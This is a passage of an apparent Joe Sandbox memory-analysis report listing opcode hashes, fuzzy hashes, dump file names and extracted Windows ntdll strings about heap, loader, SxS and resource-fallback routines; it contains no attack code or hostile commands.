                                                  • Opcode ID: 8d2dc1c13239e050fffec99e277dcfaa8652d4e1a583303f465ea4c9838a54ed
                                                  • Instruction ID: 798e39bacd20d84c1109ef5db30e2390ab14aca8c050df258050b358d348d64f
                                                  • Opcode Fuzzy Hash: 8d2dc1c13239e050fffec99e277dcfaa8652d4e1a583303f465ea4c9838a54ed
                                                  • Instruction Fuzzy Hash: E351F537A11284EFEB02CF54D854E1EB3A8EF0A764F1488ADF501DB663CA32D940EE15
                                                  Strings
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3456A79F
                                                  • DGM4, xrefs: 34522382
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3456A7AF
                                                  • LdrpDynamicShimModule, xrefs: 3456A7A5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DGM4$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-3063358063
                                                  • Opcode ID: ebbacd078b9714ade2dcd19e9c0958509bfa5aa124a62ff777d2d56945e3fbbc
                                                  • Instruction ID: 4031fe1ec8074e9648d5a6af24847df0c6742f823cbaca6dd8984d46d72481d7
                                                  • Opcode Fuzzy Hash: ebbacd078b9714ade2dcd19e9c0958509bfa5aa124a62ff777d2d56945e3fbbc
                                                  • Instruction Fuzzy Hash: BD31D07AF00200EFFB109F59D880A5A77B5FB91754F54406DF902A7250DB74AD83EB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: 835488afdc140e7d3b6a0924692a454c2289005bc344cdf92be7fba6ef05d4c9
                                                  • Instruction ID: 8b63b40d147ddbae3a0d1dc1d4aa1daa000b0f7ca53036f354a06be12cbc2e8a
                                                  • Opcode Fuzzy Hash: 835488afdc140e7d3b6a0924692a454c2289005bc344cdf92be7fba6ef05d4c9
                                                  • Instruction Fuzzy Hash: 0B42F175A04381DFEB15CF24C884B2AB7E5FF84244F4489AEE486CB762DB31D946CB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.R4
                                                  • API String ID: 0-791599749
                                                  • Opcode ID: 25cd71d831d2d44080e5b174e2a25845c09338f3780b8f74500928de88435b8f
                                                  • Instruction ID: 7b06988a2bfc75a4df6a29293df6e9ae3045ee15ef01b44458324ceca1751328
                                                  • Opcode Fuzzy Hash: 25cd71d831d2d44080e5b174e2a25845c09338f3780b8f74500928de88435b8f
                                                  • Instruction Fuzzy Hash: 99F14D76D00228EFEB51CF94D980EDEBBBCEF49650F50446AE505E7250EB749E01EB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: f5afe6c9990e90bab80946673b0133ea6dfc2eafe0ca21f9811576e5635ee2da
                                                  • Instruction ID: ff4b7e27e01fc27e0d2a0bf14f34330ade9ecf7ec61252568b9e3abf5c0b7292
                                                  • Opcode Fuzzy Hash: f5afe6c9990e90bab80946673b0133ea6dfc2eafe0ca21f9811576e5635ee2da
                                                  • Instruction Fuzzy Hash: 71C14675E01315EFFF148B64D890BBEB7A5AF46304F54446DE812EB294EB78C948E390
                                                  Strings
                                                  • RtlGetAssemblyStorageRoot, xrefs: 34571F6A, 34571FA4, 34571FC4
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34571FC9
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34571F82
                                                  • SXS: %s() passed the empty activation context, xrefs: 34571F6F
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34571F8A
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34571FA9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: d6a725a78c397c0f539df58eb04e254ca28ccc0e54d166eaf48786a70ce6d0c5
                                                  • Instruction ID: 2848dc866a0cb82e90349e5d831ac605714f0b3c05299309774b7023ee8405ef
                                                  • Opcode Fuzzy Hash: d6a725a78c397c0f539df58eb04e254ca28ccc0e54d166eaf48786a70ce6d0c5
                                                  • Instruction Fuzzy Hash: 4031C776F01624BBFB118A96AD40F5B7B6CAF51690F414469FA00B7341DA30AE41EFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: aed31a1a6815b1330cccb362b9dc8170a7bf93366e16b5cf2927f8a6961299eb
                                                  • Instruction ID: 49575d588132afecceb2c3afc25a1da90266d15e0969059d84cdb790f34235c2
                                                  • Opcode Fuzzy Hash: aed31a1a6815b1330cccb362b9dc8170a7bf93366e16b5cf2927f8a6961299eb
                                                  • Instruction Fuzzy Hash: E9F1B875E00605EFFB04CF69D890B6AB7B5FB85744F1085A8E4069BB81DB34E981EB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  APIs
                                                  Strings
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 345780E9
                                                  • Failed to reallocate the system dirs string !, xrefs: 345780E2
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 345780F3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34500586
                                                  • kLsE, xrefs: 345005FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUM4$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1429820797
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 345720C0
                                                  • .Local, xrefs: 345327F8
                                                  • SXS: %s() passed the empty activation context, xrefs: 34571FE8
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34571FE3, 345720BB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}N4
                                                  • API String ID: 0-3883691528
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUM4$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-3290304134
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eS4
                                                  • API String ID: 0-1389716106
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 34570128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 345700C7
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 345700F1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 0-2779062949
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 345DB3AA
                                                  • GlobalizationUserSettings, xrefs: 345DB3B4
                                                  • TargetNtPath, xrefs: 345DB3AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 3455E435
                                                  • HEAP: , xrefs: 3455E442
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3455E455
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: e68d2e8cff0659c4cef1529f6e06358b5027b2273e7af78d90172d0dd489200d
                                                  • Instruction ID: c3a86a51f774a77897394cda3e5814871a94152477874d456fa6af5434e052fe
                                                  • Opcode Fuzzy Hash: e68d2e8cff0659c4cef1529f6e06358b5027b2273e7af78d90172d0dd489200d
                                                  • Instruction Fuzzy Hash: EC51F235B44B84EFFB11CBA4C894F5ABBF8EF05344F4440AAE5858B662D735E901DB50
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 3456A39D
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3456A3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3456A396
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: ffd9e6086861b606b29fb02dfdf7c56f6db505dd2c4d5f9eeebc704e7695c466
                                                  • Instruction ID: d3df8df66fcec4112121f26cabea454afe6a150b469845ee74925946d0b1ca1f
                                                  • Opcode Fuzzy Hash: ffd9e6086861b606b29fb02dfdf7c56f6db505dd2c4d5f9eeebc704e7695c466
                                                  • Instruction Fuzzy Hash: C251FF74F00786DFF711CB68D884B1A77E4EB41758F5006AAE8529B6E1DB78E900EF40
                                                  Strings
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 345AD7B2
                                                  • HEAP[%wZ]: , xrefs: 345AD792
                                                  • HEAP: , xrefs: 345AD79F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 1fb3317333278fcda796c1d8381051d9f1b53d867199e4d43c32034b852d6043
                                                  • Instruction ID: 426c20f0a3d9e927dc6c5f42c65f61ed00e7433afd67ebaf9c2f24b9f296dc66
                                                  • Opcode Fuzzy Hash: 1fb3317333278fcda796c1d8381051d9f1b53d867199e4d43c32034b852d6043
                                                  • Instruction Fuzzy Hash: E7514478A00350CEF35AEE29D84477A73E7EB45284F544C9EE4C58B691DA36D80BFB20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: 5083c4f3f288974dc11541c1098a8758172e83184d9097b920dd7b7e0f605555
                                                  • Instruction ID: 5fc9b372f4646c7824cd65dc0678f705a0fbdf7e4c41c3de0c1f1c32bf8efec7
                                                  • Opcode Fuzzy Hash: 5083c4f3f288974dc11541c1098a8758172e83184d9097b920dd7b7e0f605555
                                                  • Instruction Fuzzy Hash: 64414A78A003809FFF25EE18D980B7577E0DF01355F6444FED5868BA62CABAD846DB21
                                                  Strings
                                                  • LdrpAllocateTls, xrefs: 3457194A
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34571943
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 34571954
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 3579610602670e3886b2fb2b6cf0647ce50b0421eccd1ecaec1c3a27da9a21bc
                                                  • Instruction ID: 9eed0d2520611a0297cfb304c3a9fda91a153d4c15420b65cc7e9c2d442adebf
                                                  • Opcode Fuzzy Hash: 3579610602670e3886b2fb2b6cf0647ce50b0421eccd1ecaec1c3a27da9a21bc
                                                  • Instruction Fuzzy Hash: 334148B5E01609EFEB15CFA8D841BAEBBB5FF88340F448529E406A7351DB35A901EF50
                                                  Strings
                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 3450A229
                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 3450A21B
                                                  • @SM4, xrefs: 3450A268
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
